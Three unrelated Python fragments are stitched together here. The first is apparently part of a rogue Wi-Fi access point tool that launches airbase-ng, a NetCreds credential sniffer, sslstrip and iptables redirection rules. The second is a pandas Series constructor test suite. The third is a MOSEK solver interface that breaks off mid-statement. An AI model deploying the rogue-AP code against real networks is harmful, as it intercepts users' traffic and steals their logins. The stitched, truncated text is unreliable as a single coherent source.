QMessageBox.warning(self,'Error dhcp','isc-dhcp-server not installed')
return
else:
if not self.m[4]:
QMessageBox.information(self,'Error dhcp','dnsmasq not installed')
return
self.interface = str(set_monitor_mode(self.selectCard.currentText()).setEnable())
self.config.xmlSettings('interface', 'monitor_mode',self.interface,False)
# airbase thread
Thread_airbase = ProcessThread(['airbase-ng',
'-c', str(self.EditChannel.text()), '-e', self.EditApName.text(),
'-F', 'Logs/'+asctime(),self.interface])
Thread_airbase.name = 'Airbase-ng'
self.Apthreads['RougeAP'].append(Thread_airbase)
Thread_airbase.start()
# settings conf
while True:
if Thread_airbase.iface is not None:
self.Ap_iface = [x for x in Refactor.get_interfaces()['all'] if search('at',x)][0]
self.config.xmlSettings('netcreds', 'interface',self.Ap_iface,False)
break
# thread netcreds
Thread_netcreds = ProcessThread(['python','Plugins/NetCreds.py','-i',
self.config.xmlSettings('netcreds', 'interface',None,False)])
Thread_netcreds.setName('Net-Creds')
self.Apthreads['RougeAP'].append(Thread_netcreds)
Thread_netcreds.start()
p = Process(target=self.CoreSettings,args=())
p.start(),p.join()
# thread dhcp
selected_dhcp = self.config.xmlSettings('dhcp','dhcp_server',None,False)
if selected_dhcp == 'iscdhcpserver':
Thread_dhcp = ThRunDhcp(['sudo','dhcpd','-d','-f','-cf','/etc/dhcp/dhcpd.conf',self.Ap_iface])
self.connect(Thread_dhcp,SIGNAL('Activated( QString )'), self.dhcpLog)
Thread_dhcp.setObjectName('DHCP')
self.Apthreads['RougeAP'].append(Thread_dhcp)
Thread_dhcp.start()
self.Started(True)
elif selected_dhcp == 'dnsmasq':
Thread_dhcp = ThRunDhcp(['dnsmasq','-C','Settings/dnsmasq.conf','-d'])
self.connect(Thread_dhcp,SIGNAL('Activated( QString )'), self.dhcpLog)
Thread_dhcp.setObjectName('DHCP')
self.Apthreads['RougeAP'].append(Thread_dhcp)
Thread_dhcp.start()
self.Started(True)
else:
QMessageBox.information(self,'DHCP','dhcp not found.')
# thread sslstrip
Thread_sslstrip = Threadsslstrip(self.PortRedirect)
Thread_sslstrip.setObjectName("sslstrip")
self.Apthreads['RougeAP'].append(Thread_sslstrip)
Thread_sslstrip.start()
iptables = []
for index in xrange(self.FSettings.ListRules.count()):
iptables.append(str(self.FSettings.ListRules.item(index).text()))
for rules in iptables:
if search('PREROUTING -p udp -j DNAT --to',rules):
popen(rules.replace('$$',str(self.EditGateway.text())))
elif search('--append FORWARD --in-interface',rules):popen(rules.replace('$$',self.Ap_iface))
elif search('--append POSTROUTING --out-interface',rules):
popen(rules.replace('$$',str(Refactor.get_interfaces()['activated'])))
else:
popen(rules)
def create_sys_tray(self):
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon(QIcon('rsc/icon.ico'))
self.sysTray.setVisible(True)
self.connect(self.sysTray,
SIGNAL('activated(QSystemTrayIcon::ActivationReason)'),
self.on_sys_tray_activated)
self.sysTrayMenu = QMenu(self)
act = self.sysTrayMenu.addAction('FOO')
def on_sys_tray_activated(self, reason):
if reason == 3:self.showNormal()
elif reason == 2:self.showMinimized()
def about(self):
self.Fabout = frmAbout(author,emails,
version,date_create,update,license,desc)
self.Fabout.show()
|
|
# coding=utf-8
# pylint: disable-msg=E1101,W0612
import pytest
from datetime import datetime, timedelta
from numpy import nan
import numpy as np
import numpy.ma as ma
import pandas as pd
from pandas.api.types import CategoricalDtype
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64tz_dtype)
from pandas import (Index, Series, isna, date_range,
NaT, period_range, MultiIndex, IntervalIndex)
from pandas.core.indexes.datetimes import Timestamp, DatetimeIndex
from pandas._libs import lib
from pandas._libs.tslib import iNaT
from pandas.compat import lrange, range, zip, long
from pandas.util.testing import assert_series_equal
import pandas.util.testing as tm
from .common import TestData
class TestSeriesConstructors(TestData):
def test_invalid_dtype(self):
# GH15520
msg = 'not understood'
invalid_list = [pd.Timestamp, 'pd.Timestamp', list]
for dtype in invalid_list:
with tm.assert_raises_regex(TypeError, msg):
Series([], name='time', dtype=dtype)
def test_scalar_conversion(self):
# Passing in a scalar is disabled
scalar = Series(0.5)
assert not isinstance(scalar, float)
# Coercion
assert float(Series([1.])) == 1.0
assert int(Series([1.])) == 1
assert long(Series([1.])) == 1
def test_constructor(self):
assert self.ts.index.is_all_dates
# Pass in Series
derived = Series(self.ts)
assert derived.index.is_all_dates
assert tm.equalContents(derived.index, self.ts.index)
# Ensure new index is not created
assert id(self.ts.index) == id(derived.index)
# Mixed type Series
mixed = Series(['hello', np.NaN], index=[0, 1])
assert mixed.dtype == np.object_
assert mixed[1] is np.NaN
assert not self.empty.index.is_all_dates
assert not Series({}).index.is_all_dates
pytest.raises(Exception, Series, np.random.randn(3, 3),
index=np.arange(3))
mixed.name = 'Series'
rs = Series(mixed).name
xp = 'Series'
assert rs == xp
# raise on MultiIndex GH4187
m = MultiIndex.from_arrays([[1, 2], [3, 4]])
pytest.raises(NotImplementedError, Series, m)
def test_constructor_empty(self):
empty = Series()
empty2 = Series([])
# they are Index() and RangeIndex() which don't compare type equal
# but are just .equals
assert_series_equal(empty, empty2, check_index_type=False)
empty = Series(index=lrange(10))
empty2 = Series(np.nan, index=lrange(10))
assert_series_equal(empty, empty2)
def test_constructor_series(self):
index1 = ['d', 'b', 'a', 'c']
index2 = sorted(index1)
s1 = Series([4, 7, -5, 3], index=index1)
s2 = Series(s1, index=index2)
assert_series_equal(s2, s1.sort_index())
def test_constructor_iterator(self):
expected = Series(list(range(10)), dtype='int64')
result = Series(range(10), dtype='int64')
assert_series_equal(result, expected)
def test_constructor_list_like(self):
# make sure that we are coercing different
# list-likes to standard dtypes and not
# platform specific
expected = Series([1, 2, 3], dtype='int64')
for obj in [[1, 2, 3], (1, 2, 3),
np.array([1, 2, 3], dtype='int64')]:
result = Series(obj, index=[0, 1, 2])
assert_series_equal(result, expected)
def test_constructor_generator(self):
gen = (i for i in range(10))
result = Series(gen)
exp = Series(lrange(10))
assert_series_equal(result, exp)
gen = (i for i in range(10))
result = Series(gen, index=lrange(10, 20))
exp.index = lrange(10, 20)
assert_series_equal(result, exp)
def test_constructor_map(self):
# GH8909
m = map(lambda x: x, range(10))
result = Series(m)
exp = Series(lrange(10))
assert_series_equal(result, exp)
m = map(lambda x: x, range(10))
result = Series(m, index=lrange(10, 20))
exp.index = lrange(10, 20)
assert_series_equal(result, exp)
def test_constructor_categorical(self):
cat = pd.Categorical([0, 1, 2, 0, 1, 2], ['a', 'b', 'c'],
fastpath=True)
res = Series(cat)
tm.assert_categorical_equal(res.values, cat)
# GH12574
pytest.raises(
ValueError, lambda: Series(pd.Categorical([1, 2, 3]),
dtype='int64'))
cat = Series(pd.Categorical([1, 2, 3]), dtype='category')
assert is_categorical_dtype(cat)
assert is_categorical_dtype(cat.dtype)
s = Series([1, 2, 3], dtype='category')
assert is_categorical_dtype(s)
assert is_categorical_dtype(s.dtype)
def test_constructor_categorical_dtype(self):
result = pd.Series(['a', 'b'],
dtype=CategoricalDtype(['a', 'b', 'c'],
ordered=True))
assert is_categorical_dtype(result) is True
tm.assert_index_equal(result.cat.categories, pd.Index(['a', 'b', 'c']))
assert result.cat.ordered
result = pd.Series(['a', 'b'], dtype=CategoricalDtype(['b', 'a']))
assert is_categorical_dtype(result)
tm.assert_index_equal(result.cat.categories, pd.Index(['b', 'a']))
assert result.cat.ordered is False
def test_unordered_compare_equal(self):
left = pd.Series(['a', 'b', 'c'],
dtype=CategoricalDtype(['a', 'b']))
right = pd.Series(pd.Categorical(['a', 'b', np.nan],
categories=['a', 'b']))
tm.assert_series_equal(left, right)
def test_constructor_maskedarray(self):
data = ma.masked_all((3, ), dtype=float)
result = Series(data)
expected = Series([nan, nan, nan])
assert_series_equal(result, expected)
data[0] = 0.0
data[2] = 2.0
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([0.0, nan, 2.0], index=index)
assert_series_equal(result, expected)
data[1] = 1.0
result = Series(data, index=index)
expected = Series([0.0, 1.0, 2.0], index=index)
assert_series_equal(result, expected)
data = ma.masked_all((3, ), dtype=int)
result = Series(data)
expected = Series([nan, nan, nan], dtype=float)
assert_series_equal(result, expected)
data[0] = 0
data[2] = 2
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([0, nan, 2], index=index, dtype=float)
assert_series_equal(result, expected)
data[1] = 1
result = Series(data, index=index)
expected = Series([0, 1, 2], index=index, dtype=int)
assert_series_equal(result, expected)
data = ma.masked_all((3, ), dtype=bool)
result = Series(data)
expected = Series([nan, nan, nan], dtype=object)
assert_series_equal(result, expected)
data[0] = True
data[2] = False
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([True, nan, False], index=index, dtype=object)
assert_series_equal(result, expected)
data[1] = True
result = Series(data, index=index)
expected = Series([True, True, False], index=index, dtype=bool)
assert_series_equal(result, expected)
data = ma.masked_all((3, ), dtype='M8[ns]')
result = Series(data)
expected = Series([iNaT, iNaT, iNaT], dtype='M8[ns]')
assert_series_equal(result, expected)
data[0] = datetime(2001, 1, 1)
data[2] = datetime(2001, 1, 3)
index = ['a', 'b', 'c']
result = Series(data, index=index)
expected = Series([datetime(2001, 1, 1), iNaT,
datetime(2001, 1, 3)], index=index, dtype='M8[ns]')
assert_series_equal(result, expected)
data[1] = datetime(2001, 1, 2)
result = Series(data, index=index)
expected = Series([datetime(2001, 1, 1), datetime(2001, 1, 2),
datetime(2001, 1, 3)], index=index, dtype='M8[ns]')
assert_series_equal(result, expected)
def test_series_ctor_plus_datetimeindex(self):
rng = date_range('20090415', '20090519', freq='B')
data = dict((k, 1) for k in rng)
result = Series(data, index=rng)
assert result.index is rng
def test_constructor_default_index(self):
s = Series([0, 1, 2])
tm.assert_index_equal(s.index, pd.Index(np.arange(3)))
def test_constructor_corner(self):
df = tm.makeTimeDataFrame()
objs = [df, df]
s = Series(objs, index=[0, 1])
assert isinstance(s, Series)
def test_constructor_sanitize(self):
s = Series(np.array([1., 1., 8.]), dtype='i8')
assert s.dtype == np.dtype('i8')
s = Series(np.array([1., 1., np.nan]), copy=True, dtype='i8')
assert s.dtype == np.dtype('f8')
def test_constructor_copy(self):
# GH15125
# test dtype parameter has no side effects on copy=True
for data in [[1.], np.array([1.])]:
x = Series(data)
y = pd.Series(x, copy=True, dtype=float)
# copy=True maintains original data in Series
tm.assert_series_equal(x, y)
# changes to the original do not affect the copy
x[0] = 2.
assert not x.equals(y)
assert x[0] == 2.
assert y[0] == 1.
def test_constructor_pass_none(self):
s = Series(None, index=lrange(5))
assert s.dtype == np.float64
s = Series(None, index=lrange(5), dtype=object)
assert s.dtype == np.object_
# GH 7431
# inference on the index
s = Series(index=np.array([None]))
expected = Series(index=Index([None]))
assert_series_equal(s, expected)
def test_constructor_pass_nan_nat(self):
# GH 13467
exp = Series([np.nan, np.nan], dtype=np.float64)
assert exp.dtype == np.float64
tm.assert_series_equal(Series([np.nan, np.nan]), exp)
tm.assert_series_equal(Series(np.array([np.nan, np.nan])), exp)
exp = Series([pd.NaT, pd.NaT])
assert exp.dtype == 'datetime64[ns]'
tm.assert_series_equal(Series([pd.NaT, pd.NaT]), exp)
tm.assert_series_equal(Series(np.array([pd.NaT, pd.NaT])), exp)
tm.assert_series_equal(Series([pd.NaT, np.nan]), exp)
tm.assert_series_equal(Series(np.array([pd.NaT, np.nan])), exp)
tm.assert_series_equal(Series([np.nan, pd.NaT]), exp)
tm.assert_series_equal(Series(np.array([np.nan, pd.NaT])), exp)
def test_constructor_cast(self):
pytest.raises(ValueError, Series, ['a', 'b', 'c'], dtype=float)
def test_constructor_dtype_nocast(self):
# 1572
s = Series([1, 2, 3])
s2 = Series(s, dtype=np.int64)
s2[1] = 5
assert s[1] == 5
def test_constructor_datelike_coercion(self):
# GH 9477
# incorrectly inferring on datetimelike-looking data when object dtype is
# specified
s = Series([Timestamp('20130101'), 'NOV'], dtype=object)
assert s.iloc[0] == Timestamp('20130101')
assert s.iloc[1] == 'NOV'
assert s.dtype == object
# the dtype was being reset on the slicing and re-inferred to datetime
# even though the blocks are mixed
belly = '216 3T19'.split()
wing1 = '2T15 4H19'.split()
wing2 = '416 4T20'.split()
mat = pd.to_datetime('2016-01-22 2019-09-07'.split())
df = pd.DataFrame(
{'wing1': wing1,
'wing2': wing2,
'mat': mat}, index=belly)
result = df.loc['3T19']
assert result.dtype == object
result = df.loc['216']
assert result.dtype == object
def test_constructor_datetimes_with_nulls(self):
# gh-15869
for arr in [np.array([None, None, None, None,
datetime.now(), None]),
np.array([None, None, datetime.now(), None])]:
result = Series(arr)
assert result.dtype == 'M8[ns]'
def test_constructor_dtype_datetime64(self):
s = Series(iNaT, dtype='M8[ns]', index=lrange(5))
assert isna(s).all()
# in theory this should be all nulls, but since
# we are not specifying a dtype, it is ambiguous
s = Series(iNaT, index=lrange(5))
assert not isna(s).all()
s = Series(nan, dtype='M8[ns]', index=lrange(5))
assert isna(s).all()
s = Series([datetime(2001, 1, 2, 0, 0), iNaT], dtype='M8[ns]')
assert isna(s[1])
assert s.dtype == 'M8[ns]'
s = Series([datetime(2001, 1, 2, 0, 0), nan], dtype='M8[ns]')
assert isna(s[1])
assert s.dtype == 'M8[ns]'
# GH3416
dates = [
np.datetime64(datetime(2013, 1, 1)),
np.datetime64(datetime(2013, 1, 2)),
np.datetime64(datetime(2013, 1, 3)),
]
s = Series(dates)
assert s.dtype == 'M8[ns]'
s.iloc[0] = np.nan
assert s.dtype == 'M8[ns]'
# invalid astypes
for t in ['s', 'D', 'us', 'ms']:
pytest.raises(TypeError, s.astype, 'M8[%s]' % t)
# GH3414 related
pytest.raises(TypeError, lambda x: Series(
Series(dates).astype('int') / 1000000, dtype='M8[ms]'))
pytest.raises(TypeError,
lambda x: Series(dates, dtype='datetime64'))
# invalid dates can be held as object
result = Series([datetime(2, 1, 1)])
assert result[0] == datetime(2, 1, 1, 0, 0)
result = Series([datetime(3000, 1, 1)])
assert result[0] == datetime(3000, 1, 1, 0, 0)
# don't mix types
result = Series([Timestamp('20130101'), 1], index=['a', 'b'])
assert result['a'] == Timestamp('20130101')
assert result['b'] == 1
# GH6529
# coerce datetime64 non-ns properly
dates = date_range('01-Jan-2015', '01-Dec-2015', freq='M')
values2 = dates.view(np.ndarray).astype('datetime64[ns]')
expected = Series(values2, index=dates)
for dtype in ['s', 'D', 'ms', 'us', 'ns']:
values1 = dates.view(np.ndarray).astype('M8[{0}]'.format(dtype))
result = Series(values1, dates)
assert_series_equal(result, expected)
# GH 13876
# coerce to non-ns to object properly
expected = Series(values2, index=dates, dtype=object)
for dtype in ['s', 'D', 'ms', 'us', 'ns']:
values1 = dates.view(np.ndarray).astype('M8[{0}]'.format(dtype))
result = Series(values1, index=dates, dtype=object)
assert_series_equal(result, expected)
# leave datetime.date alone
dates2 = np.array([d.date() for d in dates.to_pydatetime()],
dtype=object)
series1 = Series(dates2, dates)
tm.assert_numpy_array_equal(series1.values, dates2)
assert series1.dtype == object
# these will correctly infer a datetime
s = Series([None, pd.NaT, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
s = Series([np.nan, pd.NaT, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
s = Series([pd.NaT, None, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
s = Series([pd.NaT, np.nan, '2013-08-05 15:30:00.000001'])
assert s.dtype == 'datetime64[ns]'
# tz-aware (UTC and other tz's)
# GH 8411
dr = date_range('20130101', periods=3)
assert Series(dr).iloc[0].tz is None
dr = date_range('20130101', periods=3, tz='UTC')
assert str(Series(dr).iloc[0].tz) == 'UTC'
dr = date_range('20130101', periods=3, tz='US/Eastern')
assert str(Series(dr).iloc[0].tz) == 'US/Eastern'
# non-convertible
s = Series([1479596223000, -1479590, pd.NaT])
assert s.dtype == 'object'
assert s[2] is pd.NaT
assert 'NaT' in str(s)
# if we passed a NaT it remains
s = Series([datetime(2010, 1, 1), datetime(2, 1, 1), pd.NaT])
assert s.dtype == 'object'
assert s[2] is pd.NaT
assert 'NaT' in str(s)
# if we passed a nan it remains
s = Series([datetime(2010, 1, 1), datetime(2, 1, 1), np.nan])
assert s.dtype == 'object'
assert s[2] is np.nan
assert 'NaN' in str(s)
def test_constructor_with_datetime_tz(self):
# 8260
# support datetime64 with tz
dr = date_range('20130101', periods=3, tz='US/Eastern')
s = Series(dr)
assert s.dtype.name == 'datetime64[ns, US/Eastern]'
assert s.dtype == 'datetime64[ns, US/Eastern]'
assert is_datetime64tz_dtype(s.dtype)
assert 'datetime64[ns, US/Eastern]' in str(s)
# export
result = s.values
assert isinstance(result, np.ndarray)
assert result.dtype == 'datetime64[ns]'
exp = pd.DatetimeIndex(result)
exp = exp.tz_localize('UTC').tz_convert(tz=s.dt.tz)
tm.assert_index_equal(dr, exp)
# indexing
result = s.iloc[0]
assert result == Timestamp('2013-01-01 00:00:00-0500',
tz='US/Eastern', freq='D')
result = s[0]
assert result == Timestamp('2013-01-01 00:00:00-0500',
tz='US/Eastern', freq='D')
result = s[Series([True, True, False], index=s.index)]
assert_series_equal(result, s[0:2])
result = s.iloc[0:1]
assert_series_equal(result, Series(dr[0:1]))
# concat
result = pd.concat([s.iloc[0:1], s.iloc[1:]])
assert_series_equal(result, s)
# astype
result = s.astype(object)
expected = Series(DatetimeIndex(s._values).asobject)
assert_series_equal(result, expected)
result = Series(s.values).dt.tz_localize('UTC').dt.tz_convert(s.dt.tz)
assert_series_equal(result, s)
# astype - datetime64[ns, tz]
result = Series(s.values).astype('datetime64[ns, US/Eastern]')
assert_series_equal(result, s)
result = Series(s.values).astype(s.dtype)
assert_series_equal(result, s)
result = s.astype('datetime64[ns, CET]')
expected = Series(date_range('20130101 06:00:00', periods=3, tz='CET'))
assert_series_equal(result, expected)
# short str
assert 'datetime64[ns, US/Eastern]' in str(s)
# formatting with NaT
result = s.shift()
assert 'datetime64[ns, US/Eastern]' in str(result)
assert 'NaT' in str(result)
# long str
t = Series(date_range('20130101', periods=1000, tz='US/Eastern'))
assert 'datetime64[ns, US/Eastern]' in str(t)
result = pd.DatetimeIndex(s, freq='infer')
tm.assert_index_equal(result, dr)
# inference
s = Series([pd.Timestamp('2013-01-01 13:00:00-0800', tz='US/Pacific'),
pd.Timestamp('2013-01-02 14:00:00-0800', tz='US/Pacific')])
assert s.dtype == 'datetime64[ns, US/Pacific]'
assert lib.infer_dtype(s) == 'datetime64'
s = Series([pd.Timestamp('2013-01-01 13:00:00-0800', tz='US/Pacific'),
pd.Timestamp('2013-01-02 14:00:00-0800', tz='US/Eastern')])
assert s.dtype == 'object'
assert lib.infer_dtype(s) == 'datetime'
# with all NaT
s = Series(pd.NaT, index=[0, 1], dtype='datetime64[ns, US/Eastern]')
expected = Series(pd.DatetimeIndex(['NaT', 'NaT'], tz='US/Eastern'))
assert_series_equal(s, expected)
def test_construction_interval(self):
# construction from interval & array of intervals
index = IntervalIndex.from_breaks(np.arange(3), closed='right')
result = Series(index)
repr(result)
str(result)
tm.assert_index_equal(Index(result.values), index)
result = Series(index.values)
tm.assert_index_equal(Index(result.values), index)
def test_construction_consistency(self):
# make sure that we are not re-localizing upon construction
# GH 14928
s = Series(pd.date_range('20130101', periods=3, tz='US/Eastern'))
result = Series(s, dtype=s.dtype)
tm.assert_series_equal(result, s)
result = Series(s.dt.tz_convert('UTC'), dtype=s.dtype)
tm.assert_series_equal(result, s)
result = Series(s.values, dtype=s.dtype)
tm.assert_series_equal(result, s)
def test_constructor_periodindex(self):
# GH7932
# converting a PeriodIndex when put in a Series
pi = period_range('20130101', periods=5, freq='D')
s = Series(pi)
expected = Series(pi.asobject)
assert_series_equal(s, expected)
assert s.dtype == 'object'
def test_constructor_dict(self):
d = {'a': 0., 'b': 1., 'c': 2.}
result = Series(d, index=['b', 'c', 'd', 'a'])
expected = Series([1, 2, nan, 0], index=['b', 'c', 'd', 'a'])
assert_series_equal(result, expected)
pidx = tm.makePeriodIndex(100)
d = {pidx[0]: 0, pidx[1]: 1}
result = Series(d, index=pidx)
expected = Series(np.nan, pidx)
expected.iloc[0] = 0
expected.iloc[1] = 1
assert_series_equal(result, expected)
def test_constructor_dict_datetime64_index(self):
# GH 9456
dates_as_str = ['1984-02-19', '1988-11-06', '1989-12-03', '1990-03-15']
values = [42544017.198965244, 1234565, 40512335.181958228, -1]
def create_data(constructor):
return dict(zip((constructor(x) for x in dates_as_str), values))
data_datetime64 = create_data(np.datetime64)
data_datetime = create_data(lambda x: datetime.strptime(x, '%Y-%m-%d'))
data_Timestamp = create_data(Timestamp)
expected = Series(values, (Timestamp(x) for x in dates_as_str))
result_datetime64 = Series(data_datetime64)
result_datetime = Series(data_datetime)
result_Timestamp = Series(data_Timestamp)
assert_series_equal(result_datetime64, expected)
assert_series_equal(result_datetime, expected)
assert_series_equal(result_Timestamp, expected)
def test_constructor_list_of_tuples(self):
data = [(1, 1), (2, 2), (2, 3)]
s = Series(data)
assert list(s) == data
def test_constructor_tuple_of_tuples(self):
data = ((1, 1), (2, 2), (2, 3))
s = Series(data)
assert tuple(s) == data
def test_constructor_set(self):
values = set([1, 2, 3, 4, 5])
pytest.raises(TypeError, Series, values)
values = frozenset(values)
pytest.raises(TypeError, Series, values)
def test_fromDict(self):
data = {'a': 0, 'b': 1, 'c': 2, 'd': 3}
series = Series(data)
assert tm.is_sorted(series.index)
data = {'a': 0, 'b': '1', 'c': '2', 'd': datetime.now()}
series = Series(data)
assert series.dtype == np.object_
data = {'a': 0, 'b': '1', 'c': '2', 'd': '3'}
series = Series(data)
assert series.dtype == np.object_
data = {'a': '0', 'b': '1'}
series = Series(data, dtype=float)
assert series.dtype == np.float64
def test_fromValue(self):
nans = Series(np.NaN, index=self.ts.index)
assert nans.dtype == np.float_
assert len(nans) == len(self.ts)
strings = Series('foo', index=self.ts.index)
assert strings.dtype == np.object_
assert len(strings) == len(self.ts)
d = datetime.now()
dates = Series(d, index=self.ts.index)
assert dates.dtype == 'M8[ns]'
assert len(dates) == len(self.ts)
# GH12336
# Test construction of categorical series from value
categorical = Series(0, index=self.ts.index, dtype="category")
expected = Series(0, index=self.ts.index).astype("category")
assert categorical.dtype == 'category'
assert len(categorical) == len(self.ts)
tm.assert_series_equal(categorical, expected)
def test_constructor_dtype_timedelta64(self):
# basic
td = Series([timedelta(days=i) for i in range(3)])
assert td.dtype == 'timedelta64[ns]'
td = Series([timedelta(days=1)])
assert td.dtype == 'timedelta64[ns]'
td = Series([timedelta(days=1), timedelta(days=2), np.timedelta64(
1, 's')])
assert td.dtype == 'timedelta64[ns]'
# mixed with NaT
td = Series([timedelta(days=1), NaT], dtype='m8[ns]')
assert td.dtype == 'timedelta64[ns]'
td = Series([timedelta(days=1), np.nan], dtype='m8[ns]')
assert td.dtype == 'timedelta64[ns]'
td = Series([np.timedelta64(300000000), pd.NaT], dtype='m8[ns]')
assert td.dtype == 'timedelta64[ns]'
# improved inference
# GH5689
td = Series([np.timedelta64(300000000), NaT])
assert td.dtype == 'timedelta64[ns]'
# because iNaT is int, not coerced to timedelta
td = Series([np.timedelta64(300000000), iNaT])
assert td.dtype == 'object'
td = Series([np.timedelta64(300000000), np.nan])
assert td.dtype == 'timedelta64[ns]'
td = Series([pd.NaT, np.timedelta64(300000000)])
assert td.dtype == 'timedelta64[ns]'
td = Series([np.timedelta64(1, 's')])
assert td.dtype == 'timedelta64[ns]'
# these are frequency conversion astypes
# for t in ['s', 'D', 'us', 'ms']:
# pytest.raises(TypeError, td.astype, 'm8[%s]' % t)
# valid astype
td.astype('int64')
# invalid casting
pytest.raises(TypeError, td.astype, 'int32')
# this is an invalid casting
def f():
Series([timedelta(days=1), 'foo'], dtype='m8[ns]')
pytest.raises(Exception, f)
# leave as object here
td = Series([timedelta(days=i) for i in range(3)] + ['foo'])
assert td.dtype == 'object'
# these will correctly infer a timedelta
s = Series([None, pd.NaT, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
s = Series([np.nan, pd.NaT, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
s = Series([pd.NaT, None, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
s = Series([pd.NaT, np.nan, '1 Day'])
assert s.dtype == 'timedelta64[ns]'
def test_NaT_scalar(self):
series = Series([0, 1000, 2000, iNaT], dtype='M8[ns]')
val = series[3]
assert isna(val)
series[2] = val
assert isna(series[2])
def test_NaT_cast(self):
# GH10747
result = Series([np.nan]).astype('M8[ns]')
expected = Series([NaT])
assert_series_equal(result, expected)
def test_constructor_name_hashable(self):
for n in [777, 777., 'name', datetime(2001, 11, 11), (1, ), u"\u05D0"]:
for data in [[1, 2, 3], np.ones(3), {'a': 0, 'b': 1}]:
s = Series(data, name=n)
assert s.name == n
def test_constructor_name_unhashable(self):
for n in [['name_list'], np.ones(2), {1: 2}]:
for data in [['name_list'], np.ones(2), {1: 2}]:
pytest.raises(TypeError, Series, data, name=n)
def test_auto_conversion(self):
series = Series(list(date_range('1/1/2000', periods=10)))
assert series.dtype == 'M8[ns]'
def test_constructor_cant_cast_datetime64(self):
msg = "Cannot cast datetime64 to "
with tm.assert_raises_regex(TypeError, msg):
Series(date_range('1/1/2000', periods=10), dtype=float)
with tm.assert_raises_regex(TypeError, msg):
Series(date_range('1/1/2000', periods=10), dtype=int)
def test_constructor_cast_object(self):
s = Series(date_range('1/1/2000', periods=10), dtype=object)
exp = Series(date_range('1/1/2000', periods=10))
tm.assert_series_equal(s, exp)
def test_constructor_generic_timestamp_deprecated(self):
# see gh-15524
with tm.assert_produces_warning(FutureWarning):
dtype = np.timedelta64
s = Series([], dtype=dtype)
assert s.empty
assert s.dtype == 'm8[ns]'
with tm.assert_produces_warning(FutureWarning):
dtype = np.datetime64
s = Series([], dtype=dtype)
assert s.empty
assert s.dtype == 'M8[ns]'
# These timestamps have the wrong frequencies,
# so an Exception should be raised now.
msg = "cannot convert timedeltalike"
with tm.assert_raises_regex(TypeError, msg):
Series([], dtype='m8[ps]')
msg = "cannot convert datetimelike"
with tm.assert_raises_regex(TypeError, msg):
Series([], dtype='M8[ps]')
@pytest.mark.parametrize('dtype', [None, 'uint8', 'category'])
def test_constructor_range_dtype(self, dtype):
# GH 16804
expected = Series([0, 1, 2, 3, 4], dtype=dtype or 'int64')
result = Series(range(5), dtype=dtype)
tm.assert_series_equal(result, expected)
|
|
"""
Copyright 2015 Enzo Busseti
[ Modified by Balasubramanian Narasimhan ]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import settings as s
import numpy as np
import scipy.sparse as sp
import mosek
def mosek_intf(A, b, G, h, c, dims, offset, solver_opts, verbose = False):
data = {s.A : A,
s.B : b,
s.G : G,
s.H : h,
s.C : c,
s.OFFSET : offset,
s.DIMS : dims}
with mosek.Env() as env:
with env.Task(0, 0) as task:
kwargs = sorted(solver_opts.keys())
if "mosek_params" in kwargs:
_handle_mosek_params(task, solver_opts["mosek_params"])  # module-level helper defined below
kwargs.remove("mosek_params")
if kwargs:
raise ValueError("Invalid keyword-argument '%s'" % kwargs[0])
if verbose:
# Define a stream printer to grab output from MOSEK
def streamprinter(text):
import sys
sys.stdout.write(text)
sys.stdout.flush()
env.set_Stream(mosek.streamtype.log, streamprinter)
task.set_Stream(mosek.streamtype.log, streamprinter)
# size of problem
numvar = len(c) + sum(dims[s.SOC_DIM])
numcon = len(b) + dims[s.LEQ_DIM] + sum(dims[s.SOC_DIM]) + \
sum([el**2 for el in dims[s.SDP_DIM]])
# otherwise it crashes on an empty problem
if numvar == 0:
result_dict = {s.STATUS: s.OPTIMAL}
result_dict[s.PRIMAL] = []
result_dict[s.VALUE] = 0. + data[s.OFFSET]
result_dict[s.EQ_DUAL] = []
result_dict[s.INEQ_DUAL] = []
return result_dict
# objective
task.appendvars(numvar)
task.putclist(np.arange(len(c)), c)
task.putvarboundlist(np.arange(numvar, dtype=int),
[mosek.boundkey.fr]*numvar,
np.zeros(numvar),
np.zeros(numvar))
# SDP variables
if sum(dims[s.SDP_DIM]) > 0:
task.appendbarvars(dims[s.SDP_DIM])
# linear equality and linear inequality constraints
task.appendcons(numcon)
if A.shape[0] and G.shape[0]:
constraints_matrix = sp.bmat([[A], [G]])
else:
constraints_matrix = A if A.shape[0] else G
coefficients = np.concatenate([b, h])
row, col, el = sp.find(constraints_matrix)
task.putaijlist(row, col, el)
type_constraint = [mosek.boundkey.fx] * len(b)
type_constraint += [mosek.boundkey.up] * dims[s.LEQ_DIM]
sdp_total_dims = sum([cdim**2 for cdim in dims[s.SDP_DIM]])
type_constraint += [mosek.boundkey.fx] * \
(sum(dims[s.SOC_DIM]) + sdp_total_dims)
task.putconboundlist(np.arange(numcon, dtype=int),
type_constraint,
coefficients,
coefficients)
# cones
current_var_index = len(c)
current_con_index = len(b) + dims[s.LEQ_DIM]
for size_cone in dims[s.SOC_DIM]:
row, col, el = sp.find(sp.eye(size_cone))
row += current_con_index
col += current_var_index
task.putaijlist(row, col, el)  # add an identity block for each cone
# add a cone constraint
task.appendcone(mosek.conetype.quad,
0.0, # unused
np.arange(current_var_index,
current_var_index + size_cone))
current_con_index += size_cone
current_var_index += size_cone
# SDP
for num_sdp_var, size_matrix in enumerate(dims[s.SDP_DIM]):
for i_sdp_matrix in range(size_matrix):
for j_sdp_matrix in range(size_matrix):
coeff = 1. if i_sdp_matrix == j_sdp_matrix else .5
task.putbaraij(current_con_index,
num_sdp_var,
[task.appendsparsesymmat(size_matrix,
[max(i_sdp_matrix,
